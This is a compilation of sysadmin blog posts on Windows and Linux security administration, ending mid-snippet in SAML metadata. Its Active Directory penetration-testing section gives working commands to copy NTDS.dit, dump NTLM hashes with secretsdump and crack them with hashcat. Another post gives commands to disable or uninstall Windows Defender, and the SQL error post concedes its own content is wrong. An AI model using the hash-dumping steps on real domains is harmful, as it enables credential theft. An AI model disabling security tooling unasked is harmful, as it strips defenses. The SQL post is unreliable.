How to Implement Local Administrator Password Solution (LAPS) on Windows

Overview

LAPS or Local Administrator Password Management is a good solution for local administrator account and password management.

Use-Case:
-We recently had an issue with not being able to login as local administrator on a restored backup of a server in Veeam because we did not know the password for the local admin account.
-This exposed the issue that we need centralized management of Local Administrator Accounts and Passwords.
Action Plan

Basic steps can be broken down into 7 steps:

1. Download LAPS.
2. Extend AD Schema
3. Install LAPS Group Policy Files
4. Set Options for LAPS
5. Assign Permissions
6. Push Group Policy to Appropriate OU’s
7. Validation of Installation and Configuration

1. Preparations

  1. Make a full backup of Active Directory
  2. Download LAPS
    https://www.microsoft.com/en-us/download/details.aspx?id=46899

2. Extend AD Schema (requires Schema Admins membership)

Import-module AdmPwd.PS
Update-AdmPwdADSchema

3. Install LAPS Group Policy Files
– *.admx goes into the “windows\policydefintions” folder
– *.adml goes into the “\windows\policydefinitions\[language]” folder

4. Set options
– GPMC > Computer configuration > Policies > Administrative Templates > LAPS
– Password settings — set frequency and complexity (use default)
– Name of administrator account to manage — Rename administrator account to something non-default such as “localadmin”
– Do not allow password expiration time longer than required by policy — set to TRUE to avoid disconnected computers to change password and be out of sync with AD
– Enable local password management — must be set to TRUE to activate policy

5. Assign Permissions
– Create 2 security groups: “LAPS_ReadOnly” and “LAPS_Admins”
– Create a test OU named “Test_OU” and move some test machines into this container
– Apply GP:

Set-AdmPwdComputerSelfPermission -OrgUnit "Test_OU"

– Set permission:

Set-AdmPwdReadPasswordPermission -OrgUnit "Test_OU" -AllowedPrincipals "LAPS_ReadOnly"
Set-AdmPwdResetPasswordPermission -OrgUnit "Test_OU" -AllowedPrincipals "LAPS_Admins"

6. Push GP to Appropriate OUs
– Script content:

# This script installs the LAPS library onto the local machine
$admpwdFile="\\FileSherver01\Software\LAPS\admpwd.dll"
copy $admpwdFile "%windir%\system32"
regsvr32.exe AdmPwd.dll
gpupdate /force

– Apply this logon script to the correct OU

7. Validation
– Install the LAPS GUI onto a workstation > query a machine within the affected OU > verify that its local admin password has been set

Impacts Assessment:

Users Impacts: None shall be perceived

Systems Internal Impacts:

New Objects:
– 2 new security groups are added: “LAPS_ReadOnly” and “LAPS_Admins”
– 1 new OU named “Test_OU” is created
– 1 new Group Policy named “LAPS” will be made

Logon Script named “admpwdFile.bat” will be applied toward computers located inside the “TEST_OU”:
# This script installs the LAPS library onto the local machine
$admpwdFile=”\\FileSherver01\Software\LAPS\admpwd.dll”
copy $admpwdFile “%windir%\system32”
regsvr32.exe AdmPwd.dll
gpupdate /force

Effects of “Update-AdmPwdADSchema” command:
– AD Schema will be extended 2 new custom attributes:
— cn=ms-Mcs-AdmPwd, CN=Schema,CN=configuration,DC=intranet,DC=kimconnect,DC=com
— cn=ms-Mcs-AdmPwdExpirationTime,CN=Schema,CN=configuration,DC=intranet,DC=kimconnect,DC=com
– This 1 existing Schema Class will be modified
— cn=computer,CN=Schema,CN=Configuration,DC=intranet,DC=kimconnect,DC=com
– Test machines and subsequent machines with GP applied will have this DLL added to local paths of C:\Windows\System32 — file name: admpwd.dll

Risks Analysis:

This is a MEDIUM risk item due to these considerations
– Custom attribute of AD Schema is intended to be permanent; normally, a change to AD schema is a “High” risk concern. Since we are utilizing a Microsoft product to extend an existing Microsoft product, perfect integration is expected. Therefore the risk should be downgraded to “Medium.”
– Domain Admins will have access to the local passwords of all targeted machines. Hence, further AAA mitigation techniques should follow. Hence, this sub-item indicates a “Medium” level consideration.
– No user-perceivable effects. Hence, this sub-item indicates “Low” risk.

Validation:

– “Step 7” in the execution plan provides validation on whether LAPS has been successfully applied toward test Windows machines inside the “TEST_OU”

Roll-back Plan:

-Perform authoritative restore on PDC

Securing Windows Remote Desktop Services

secpol.msc > Local Policies > User Rights Assignments > double-click “Allow Log on through Remote Desktop Services” > remove Administrators and Remote Desktop Users > Add a customized group and/or users

gpedit.msc > Computer Configuration > Adminstrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session host > security > change these settings:
– Set client encryption level = High
– Require secure RPC communication = Enabled
– Require use of specific security layer for remote (RDP) connections = SSL
– Require user authentication for remote connections by using Network Level Authentication = Enabled

Penetration Testing of Active Directory

Foreword: the following information is intended as educational contents and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions to perform evasive techniques as that is against the moral character of ethical hacking.

1. Grab the NTDS.dit and systemhive from a domain controller

vssadmin create shadow /for=C:
copy \\?GLOBALROOT\Device\Harddisk\VolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Reg SAVE HKLM\SYSTEM C:\systemhive

2. Extract the hashes using impacket (https://github.com/SecureAuthCorp/impacket)

git clone https://github.com/SecureAuthCorp/impacket.git
python setup.py install
python /opt/impacket/examples/secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM -hashes lmhash:nthash LOCAL -outputfile pentest-ntlm-extract

3. Decode the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat (https://hashcat.net/wiki)
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username -o ~/pentest/pentest.out — outfile-format=3 ~/pentest/pentest-ntlm-extact.ntds ~/pentest.txt — potfile-path ~/pentest/hashcat.pot
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username — show -o ~/pentest/pentest_1.out — outfile-format=3 ~/pentest/ pentest-ntlm-extact.ntds — potfile-path ~/pentest/pentest.out
  1. Plain PowerShell

Microsoft SQL Server Error 18456

In a properly managed environment, the security team usually tracks the server logs for any failed login events. Here’s an example of such report:

Looking at Windows’ log [image missing, whatever…]

Checking SQL server for the target user

Granting permissions

Granting connect permissions

This has been just a punch of screenshots for no reasons. In fact, the resolution for this error is completely different from the the assumptions above. Search this blog further if you’re looking for a fix for your identical error code.

File Access Control

System Engineers must follow the security principle of authentication, authorization, and accounting (AAA) as the framework for controlling access to information technology resources. Authentication and accounting is applied by Active Directory. The administrative element, Authorization is illustrated in the image below.

Identify target files and/or directories

It’s necessary to specify the target folders and any child-items that the original requester has been authorized by Management to access. For example, here is a view of a test folder on the network

Ensure that “File Permission Admins” Group has Full access

The “File Permission Admins” would most likely already have access to network directories. One could check this by selecting a file/folder >> right-click on item >> left-click on Properties >> click on Security tab to have this view:

  • Seize Ownership

In the rare instances when an object is inaccessible due to “File Permission Admins” being removed from its NTFS permissions list. This would be evidenced with the phrase, “You do not have permission to view or edit this object’s permission settings” when a member of the referenced group tries to access it.

To resolve this issue, the Engineer would click on the Advanced button >> click on the Owner tab

Click on the Edit button >> highlight Administrators group >> put a check mark next to “Replace owner on subcontainers and objects” >> click OK

Click OK on the next prompt

  • Grant “File Permission Admins” Full control

Once ownership has been seized, NTFS permissions list can be edited to give the “File Permission Admins” control of the object by simply: right-click object >> Properties >> select Security tab >> Edit >> Add “File Permission Admins” onto the list with Full access >> OK

Please be advised that the procedure above would only be effective on the immediate object and any of its children with Inheritance Enabled. If Inheritance has been removed on any items inside the parent folder, its children would reject any access attempts from member of the File Permission Admins. Hence, this error would occur:

If this happens, it would be necessary to either manually or via scripting to repeat the seizing ownership steps and complete the task.

Once the task is completed. System Engineers would reroute the ticket back to the User Admins queue so that such group can proceed with enabling access to the original requester.

Linux: Remediate SSL Weak Cipher Suites

Description

The remote host supports the use of SSL ciphers that offer weak encryption.

Note: This is considerably easier to exploit if the attacker is on the same physical network.

Output
Here is the list of weak SSL ciphers supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

DES-CBC-SHA Kx=RSA Au=RSA Enc=DES-CBC(56) Mac=SHA1

The fields above are :

{OpenSSL ciphername}
Kx={key exchange}
Au={authentication}
Enc={symmetric encryption method}
Mac={message authentication code}
{export flag}

Source: Tenable.IO

Solution


Reconfigure the affected application, if possible to avoid the use of weak ciphers.

Edit the following file:

sudo vim /etc/httpd/conf.d/ssl.conf

… with this content:

SSLProtocol -all -SSLv2 -SSLv3 -TLSv1 +TLSv1.1 +TLSv1.2

SSLCipherSuite "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 !EECDH+aRSA+RC4 EECDH EDH+aRSA !RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS !EDH-RSA-DES-CBC3-SHA !ECDHE-RSA-DES-CBC3-SHA !DES-CBC3-SHA !ECDHE-RSA-RC4-SHA !RC4-MD5 !RC4-SHA"

For Windows, follow this script: https://kimconnect.com/powershell-windows-2016-pristine-image

Security Updates for Windows 10 / Windows Server 2016 / Windows Server 2019 (March 2019) (Spectre) (Meltdown) (Foreshadow)

Description
The remote Windows host is missing a security update. It is, therefore, missing microcode updates to address the following vulnerabilities:

– Spectre Variant 3a (CVE-2018-3640: Rogue System Register Read (RSRE)).

– Spectre Variant 4 (CVE-2018-3639: Speculative Store Bypass (SSB))

– L1TF (CVE-2018-3620, CVE-2018-3646: L1 Terminal Fault)
 
Solution
Microsoft has released security updates for Windows 10, Windows Server 2016 and Server 2019.

I’ve written 2 functions to check and remediate this vulnerability:

function checkSpectreVulnerability{
<#
# Checking hotfix
Get-HotFix -Id "KB4346087"
dism /online /get-packages | findstr KB4346087
#>

$regexRemoveDots="\."
$patchedVersion="10.0.14393.2842"
$actualVersion=(Get-Item C:\Windows\system32\mcupdate_genuineintel.dll | select VersionInfo).VersionInfo.ProductVersion
$fixedActualVersion=if($actualVersion.length -lt 15){$actualVersion+"0";}
"$actualVersion vs $patchedVersion"
if([double]($fixedActualVersion -replace $regexRemoveDots) -lt [double]($patchedVersion -replace $regexRemoveDots)){
"Spectre meltdown vulnerability detected.";
fixList.Add('fixSpectreVulnerability');
}
else{"No Spectre meltdown vulnerability detected.";}
}
function fixSpectreVulnerability{
# KB4346087: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4346087%20
$spectreDownload="http://download.windowsupdate.com/c/msdownload/update/software/updt/2019/02/windows10.0-kb4346087-v3-x64_d108fe2af745ebf98bfb0548c905c07715492941.msu"
$spectreDestination="C:\Temp\kb4346087-v3-x64.msu"
download $spectreDownload $spectreDestination
wusa.exe -kb $spectreDestination /norestart /quiet

<#
# DISM method
mkdir c:\temp\KB4346087
Expand –F:* $spectreDestination c:\temp\KB4346087
DISM.exe /Online /Add-Package /PackagePath:c:\temp\KB4346087\Windows10.0-KB4346087-v3-x64.cab /NoRestart
#>
}

Output

PS C:\Users\test\Desktop\unit-test.ps1
10.0.14393.2842 vs 10.0.14393.2842
No Spectre meltdown vulnerability detected.

KB4346087 includes mcupdate_genuineintel.dll version 10.0.14393.2842. Manual installation would cause this popup to occur if the script above has already been triggered:


Here’s the result of a query of applied KB4346087 on this test system:

Example of system without KB4346087 installed (empty result)

PS C:\Users\test> dism /online /get-packages | findstr -i "KB4346087"
PS C:\Users\test>

PS C:\Users\test> Get-HotFix -Id "KB4346087"
Get-HotFix : Cannot find the requested hotfix on the 'localhost' computer. Verify the input and run the command again.
At line:1 char:1
+ Get-HotFix -Id "KB4346087"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (:) [Get-HotFix], ArgumentException
+ FullyQualifiedErrorId : GetHotFixNoEntriesFound,Microsoft.PowerShell.Commands.GetHotFixCommand

Example of pending install (no install date):

PS C:\Users\test> dism /online /get-packages | findstr -i "KB4346087"
Package Identity : Package_for_KB4346087~31bf3856ad364e35~amd64~~10.0.3.0

PS C:\Users\test> Get-HotFix -Id "KB4346087"

Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
KOMPUTER Update KB4346087

Confirmation of pending stalls:

PS C:\Users\test> Dism.exe /Online /Get-Packages

Deployment Image Servicing and Management tool
Version: 10.0.14393.0

Image Version: 10.0.14393.2457

Packages listing:

Package Identity : Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Foundation
Install Time : 7/16/2016 1:25 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Basic-en-gb-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:40 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Basic-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:41 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Handwriting-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:46 PM

Package Identity : Microsoft-Windows-LanguageFeatures-OCR-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:47 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Speech-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:47 PM

Package Identity : Microsoft-Windows-LanguageFeatures-TextToSpeech-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:47 PM

Package Identity : Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/4/2019 10:35 PM

Package Identity : Microsoft-Windows-Security-SPP-Component-SKU-ServerStandard-GVLK-Package~31bf3856ad364e35~amd64~~10.0
.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 2/2/2018 7:27 PM

Package Identity : Microsoft-Windows-Server-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~10.0.14393.0
State : Installed
Release Type : Language Pack
Install Time : 2/2/2018 6:13 PM

Package Identity : Microsoft-Windows-ServerCore-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 7/16/2016 1:25 PM

Package Identity : Microsoft-Windows-ServerCore-Server-Common-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 7/16/2016 1:25 PM

Package Identity : Microsoft-Windows-ServerCore-SKU-Foundation-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 7/16/2016 1:25 PM

Package Identity : Package_for_KB4049065~31bf3856ad364e35~amd64~~10.0.1.3
State : Installed
Release Type : Update
Install Time : 2/2/2018 7:21 PM

Package Identity : Package_for_KB4054590~31bf3856ad364e35~amd64~~10.0.1.2072
State : Installed
Release Type : Update
Install Time : 2/23/2019 4:11 AM

Package Identity : Package_for_KB4091664~31bf3856ad364e35~amd64~~10.0.6.0
State : Installed
Release Type : Update
Install Time : 2/5/2019 6:39 PM

Package Identity : Package_for_KB4132216~31bf3856ad364e35~amd64~~10.0.1.0
State : Installed
Release Type : Update
Install Time : 2/4/2019 11:46 PM

Package Identity : Package_for_KB4346087~31bf3856ad364e35~amd64~~10.0.3.0
State : Install Pending
Release Type : Update
Install Time :

Package Identity : Package_for_KB4465659~31bf3856ad364e35~amd64~~10.0.1.2
State : Installed
Release Type : Security Update
Install Time : 2/5/2019 1:26 AM

Package Identity : Package_for_KB4485447~31bf3856ad364e35~amd64~~10.0.1.1
State : Installed
Release Type : Security Update
Install Time : 2/23/2019 4:11 AM

Package Identity : Package_for_RollupFix~31bf3856ad364e35~amd64~~14393.1884.1.3
State : Superseded
Release Type : Security Update
Install Time : 2/2/2018 7:21 PM

Package Identity : Package_for_RollupFix~31bf3856ad364e35~amd64~~14393.2941.1.10
State : Installed
Release Type : Update
Install Time : 5/1/2019 7:05 PM

The operation completed successfully.

Once the patch has already been applied. Rebooting the computer will be the last step to enable Windows system to render patching as completed.

PowerShell: Remediate Microsoft Windows Unquoted Service Path Enumeration

Description
The remote Windows host has at least one service installed that uses an unquoted service path, which contains at least one whitespace. A local attacker can gain elevated privileges by inserting an executable file in the path of the affected service.

Note that this is a generic test that will flag any application affected by the described vulnerability.
 
(Source: Tenable.IO)
 
Solution
Ensure that any services that contain a space in the path enclose the path in quotes.

There are more than one way to skin this rabbit. The manual method of doing it is time consuming. Why use the proverbial knife to perform this task when a security company, Vector BCO has already provided the machinery to instantly convert rabbits to predigested protein? I don’t like this analogy any more than you do, so I’ll stop doodling and get to the point.

Oh, the point… There’s this PowerShell Script to Automate a Fix for Windoze boxes residing in environments that are proxy controlled.

#Set Proxy values
$proxy="http://proxy:8080";
$exclusionList="localhost;*.kimconnect.com"

function fixProxy{

# Check if proxy is enabled on the system and fix it
$proxyKey=(Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings")
if ($proxyKey.ProxyEnable){
# Set http proxy for browsers
Set-Itemproperty -path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name 'ProxyServer' -value $proxy

# Set winhttp proxy for PowerShell
netsh winhttp set proxy $proxy $exclusionList
[system.net.webrequest]::defaultwebproxy = New-Object system.net.webproxy($proxy)
[system.net.webrequest]::defaultwebproxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
[system.net.webrequest]::defaultwebproxy.BypassProxyOnLocal = $true
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
}

if (checkProxy){
"Proxy is now good to go..."
$GLOBAL:haveInternet=$True;
}
else{
"Proxy problems..."
$GLOBAL:haveInternet=$False;
break;
}
}

function checkProxy{
try{
$connectionTest=iwr download.microsoft.com
if ($connectionTest){
$haveInternet=$True;
return $True;
}
}
catch{
return $False
}
}


function fixUnquotedServicePathEnum{
if (!($haveInternet)){fixProxy;}

$fixScriptDownload="https://kimconnect.com/wp-content/uploads/2019/05/Windows_Path_Enumerate.zip"
$fixScriptDestination="C:\Temp\Windows_Path_Enumerate.zip"
$destination="C:\Temp"
(New-Object System.Net.WebClient).DownloadFile($fixScriptDownload, $fixScriptDestination)
expand-archive -path $fixScriptDestination -destinationpath $destination
C:\Temp\Windows_Path_Enumerate.ps1 -FixUninstall -FixEnv

<# This doesn't work if proxy and blocking ps1 downloads or Microsoft requires a manual trigger of agreement
$fixScriptDestination="C:\Temp\Windows_Path_Enumerate.ps1"
$fixScriptDownload="https://gallery.technet.microsoft.com/scriptcenter/Windows-Unquoted-Service-190f0341/file/136821/7/Windows_Path_Enumerate.ps1"
(New-Object System.Net.WebClient).DownloadFile($fixScriptDownload, $fixScriptDestination)
C:\Temp\Windows_Path_Enumerate.ps1 -FixUninstall -FixEnv
#>
}

fixUnquotedServicePathEnum;
Expected Output
C:\Users\kimconnect\Desktop\unit-test.ps1
2019-05-10 18:05:10Z : INFO : Executed x64 Powershell on x64 OS
2019-05-10 18:05:10Z : INFO : Computername: KOMPUTER
2019-05-10 18:05:10Z : Old Value : Service : 'ams' - C:\Program Files\OEM\AMS\service\ams.exe
2019-05-10 18:05:10Z : Expected : Service : 'ams' - "C:\Program Files\OEM\AMS\service\ams.exe"
2019-05-10 18:05:10Z : SUCCESS : Path value was changed for Service 'ams'
2019-05-10 18:05:11Z : Old Value : Service : 'sma' - C:\Program Files\OEM\AMS\service\sma.exe
2019-05-10 18:05:11Z : Expected : Service : 'sma' - "C:\Program Files\OEM\AMS\service\sma.exe"
2019-05-10 18:05:11Z : SUCCESS : Path value was changed for Service 'sma'
2019-05-10 18:05:11Z : Old Value : Software : '{92F2A534-C3E4-4B18-BEBD-329F5E848C8B}' - C:\Program Files\Altiris\Altiris Agent\aexnsagent
.exe /uninstall
2019-05-10 18:05:11Z : Expected : Software : '{92F2A534-C3E4-4B18-BEBD-329F5E848C8B}' - "C:\Program Files\Altiris\Altiris Agent\aexnsagen
t.exe" /uninstall
2019-05-10 18:05:11Z : SUCCESS : Path value was changed for Software '{92F2A534-C3E4-4B18-BEBD-329F5E848C8B}'
Additional Information from Tenable.IO
Risk Information

Risk Factor: Medium
CVSS v3.0 Base Score: 7.8
CVSS v3.0 Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.0 Temporal Vector: E:P/RL:O/RC:C
CVSS v3.0 Temporal Score: 7.0
CVSS Base Score: 6.9
CVSS Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C
CVSS Temporal Score: 5.4
CVSS Temporal Vector: E:POC/RL:OF/RC:C

Vulnerability Information

Exploit Available: true
Exploit Ease: Exploits are available
Vulnerability Pub Date: 09/15/12 at 12:00 AM
Exploitable With
Metasploit (Windows Service Trusted Path Privilege Escalation)

Reference Information

CVE: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1609, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0759, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5455
ICSA: 14-058-01

PowerShell: Disable Windows Defender

Even though Windows Defender can run along side Enterprise antivirus software such as McAfee or Norton, it would be necessary to disable it on systems that already have those security applications installed. Here are two automated methods to get this done.

1. PowerShell on Localhost

On Windows 2012 R2, these commands would have worked

# Disable Defender's Real Time scanning engine
Set-MpPreference -DisableRealtimeMonitoring $True

# Deactivate the scanning engine via registry
Set-ItemProperty -Path "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Force

However, the above lines are no longer valid for Windows 10 & 2016 (source: https://support.microsoft.com/en-us/help/4052623/update-for-windows-defender-antimalware-platform). On KB4052623, Microsoft has changed to registry location of Defender. Hence, Active Directory Group Policy and PowerShell commands to disable this feature are no longer effective.

For those who are interested in security topics, these are the related advisories leading to this change:

  • https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11937
  • https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11940
# My fancy way to check if WinDefend is installed
try{Get-MpComputerStatus;"Windows Defender IS enabled on this system.";}
catch{"Windows Defender is NOT enabled on this system.";}

# This is the better method provided by Michael Shoff
sc query windefend
# Disable it within the registry (failed attempt)
Set-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Force
# Error
PS C:\Users\tester> Set-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Force
Set-ItemProperty : Requested registry access is not allowed.
At line:1 char:1
+ Set-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Def ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (HKLM\SOFTWARE\Microsoft\Windows Defender:String) [Set-ItemProperty],
SecurityException
+ FullyQualifiedErrorId : System.Security.SecurityException,Microsoft.PowerShell.Commands.SetItemPropertyCommand
# Attempt to set permissions (failed)
$acl = Get-Acl "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender"
$fullControl = New-Object System.Security.AccessControl.RegistryAccessRule ("$env:COMPUTERNAME\Administrators","FullControl","Allow")
$acl.SetAccessRule($fullControl)

In case you’re sensing that all this has been non-sense; without further adieu, this is the line to address the issue.

# Uninstall WinDefend
Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
2. Group Policy

Run ADUC: Create new GPO as follows:
Computer configuration > Administrative templates > Windows components > Windows Defender > Set these values:

Turn off Windows Defender = Enabled
Real-time protection = Off (optional as Defender has already turned off per the preceding setting)

Please note that this GP instruction is to be applied toward Windows 2016 & 2019. This may not work for Windows 2008, 2012, and Linux.

Default Ports for Various Common Services

Although it is recommended that these default ports be changed whenever possible to add an additional layer of security (via obfuscation), default ports are a good rule of thumb for Network Engineers to begin troubleshooting connectivity issues. Moreover, security penetration testing often reference these numbers during port scanning, prior to applying exploit plugins.

FTP:
21/TCP
TFTP:
69/UDP
8099/TCP (user interface to TFTP service traffic)
SMB:
445/TCP
137,138/UDP
139/TCP (NetBIOS)
Active Directory:
53/UDP
636/UDP,TCP
88/UDP,TCP 464/UDP,TCP
3268/UDP,TCP
RDP:
3389/TCP
WinCollect:
135/TCP (Microsoft Endpoint Mapper)
137/UDP (NetBIOS name service)
138/UDP (NetBIOS datagram service)
139/TCP (NetBIOS session service)
445/TCP (Microsoft Directory Services for file transfers that use Windows share)
49152-65535/TCP (Default dynamic port range for TCP/IP)
OpenLDAP:
389/TCP
636/TCP (LDAP SSL)
NTP:
123/UDP
RPC:
135/TCP (default listener)
49152-65535/TCP (RPC outgoing port range)
Websense Proxy:
80,443/TCP (incoming requests)
9443,19448/TCP (UI Browsing)
22/TCP (Protector)
https://www.websense.com/content/support/library/deployctr/v76/triton_ports.aspx
Squid:
3128,3129/TCP (HTTP default port)
PostgreSQL:
8432/TCP
MySQL
3306/TCP
Microsoft SQL
--------------------------
Inbound:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)

Outbound:
49152-65535
Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP
MongoDB:
27017,27018,27019/TCP
Veeam:
80/TCP (download updates)
443/TCP (HTTPS license auto-update)
10443/TCP (HTTPS)
902/TCP (Data Transfer)
22/TCP (control channel)
1433/TCP (Microsoft SQL backup via Veeam)
53/UDP (DNS communication)
9501/TCP (communication between Veeam Broker Service and its components)
9392/TCP (Replication)
10003/TCP (Veeam Cloud Connect)
2500/TCP (transmission channels)
6160/TCP (Veeam installer service)
6161/TCP (Veeam vPower NFS Service)
6162/TCP (Data Mover service)
RPC
SMB
HPE StoreOnce
111/TCP (mountd service used by NFS and DDBOOST)
2049 (NFS)
2052 (NFS mountd)
HPE StoreOnce
9387,9389/TCP
Norton
139,445/TCP
137,138/UDP
22/TCP
2967,2968/TCP
2638/TCP
1433/TCP
8443,8444/TCP
9090/TCP
8014/TCP
443/HTTPS
8081/HTTP
8082/HTTPS
8445,8446,8447/TCP
8765/TCP
1100/TCP
514/UDP
WhatsUpGold
ICMP
20/TCP (inbound FTP)
21-23/TCP (outbound FTP)
25/TCP (outbound mail)
53/UDP (outbound DNS)
80/TCP (outbound monitoring)
80,443/TCP (inbound webserver)
https://community.ipswitch.com/s/article/Network-ports-used-by-Ipswitch-Network-Management-products-1307717736810
SNMP:
161,162/UDP,TCP
Altiris:
5663/TCP
50124/TCP
KMS:
1688/TCP
SSH:
22/TCP
HTTP:
80/TCP
443/TCP
SMTP:
25/TCP (Non-Encrypted, Auth)
587/TCP (Secure TLS, StartTLS)
465/TCP (Secure SSL, SSL)
POP3:
110/TCP (Unencrypted, Auth)
995/TCP (Secure SSL, SSL)

Wireshark Overview

SysAdmins, InfoSec, and Network Engineers often use this tool to troubleshot and detect network activities on-the-fly. Without further adieu, here is an overview on the usage of this thingy:

1. Configure wireshark to listen to an interface
2. To collect data, click Start
3. Data columns

  1. Source
  2. Destination
  3. Protocol
  4. Length
  5. Info

4. Filtering raw data to produce information

  1.  Filter > type in protocol name (e.g. FTP) > select a packet > scroll down to the protocol section
  2. To narrow down filter to view a certain host and protocol, input (ftp) && (<IP_ADDRESS>). This can also be done by right-click an interesting packet > select filter by

5. How to detect a network scan

  1. If a the Info section shows “RST” / TCP ACKed unseen segment(usually being marked as black by Wireshark for quick identification of bad packets), it means that the local interface has dropped the packet. This can be interpreted as a network scan detection if the other nodes on the network is showing the same origination IP with similar responses.
  2. If the local interface is sending unknown traffic to a strange remote IP, follow your operating system’s syntax to trace down to the offending pplication or process. Here are some sample commands on various OS’es:
i. Windows: run CLI > netstat | findstr "{port_number}" > netstat -aon | find /I "{PID}"

ii. Linux:run CLI > netstat -lnp | grep {port_number}

iii. MacOS: run CLI > sudo lsof -i:{port_number} > locate the PID of probable cause > run Activity Monitor > match the PID of the suspecting app > halt process

IP Helper Address

What is it and how to use it?

When the DHCP Server is placed on a different subnet from the all its clients. It is important that the router at the disparate subnets be configured with an “IP helper-address” specifying the Server as its pass-through broadcast node. Here is a sample command to enable such configuration:

CORE01 (config-if)#ip helper-address 192.168.0.1

Be advised that the “IP-Helper” feature opens up a suite of ports:

Protocol

UDP Port

Timeserver (not same as NTP port UDP 123)

37

TACACS

49

DNS

53

BOOTP/DHCP Server

67

BOOTP/DHCP Client

68

TFTP

69

NetBIOS name   service

137

NetBIOS datagram   service

138

IEN-116 name   service

42

To enhance the network security posture, it may be necessary to close any unused port with commands such as this (Cisco):

CORE01 (config-if)#no ip forward-protocol udp 49

How to Use QRadar to Search for a Windows Account Activities

Log into https://qradar/console/qradar/jsp/QRadar.jsp

Log Activity > Add Filter > Parameter=Username[Indexed] | Operator=Equals any of | Value=”UserName” > click on ‘+’ sign > click Add Filter

Click on View > Selection An Option = Last 24 hours

Wait for progress to complete > view through any resulting item

Sample Multi-Site Metadata

SimpleSAML PHP module requires that each site to be configured with a $metadata entry. Below is a sample of this data.

$metadata['https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/metadata.php/default-sp'] = array (
'SingleLogoutService' =>
array (
0 =>
array (
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-logout.php/default-sp',
),
),
'AssertionConsumerService' =>
array (
0 =>
array (
'index' => 0,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST',
